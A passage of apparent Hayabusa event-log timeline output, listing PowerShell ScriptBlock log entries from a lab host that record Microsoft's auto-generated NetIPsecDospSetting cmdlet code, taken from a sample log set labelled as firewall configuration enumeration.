'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 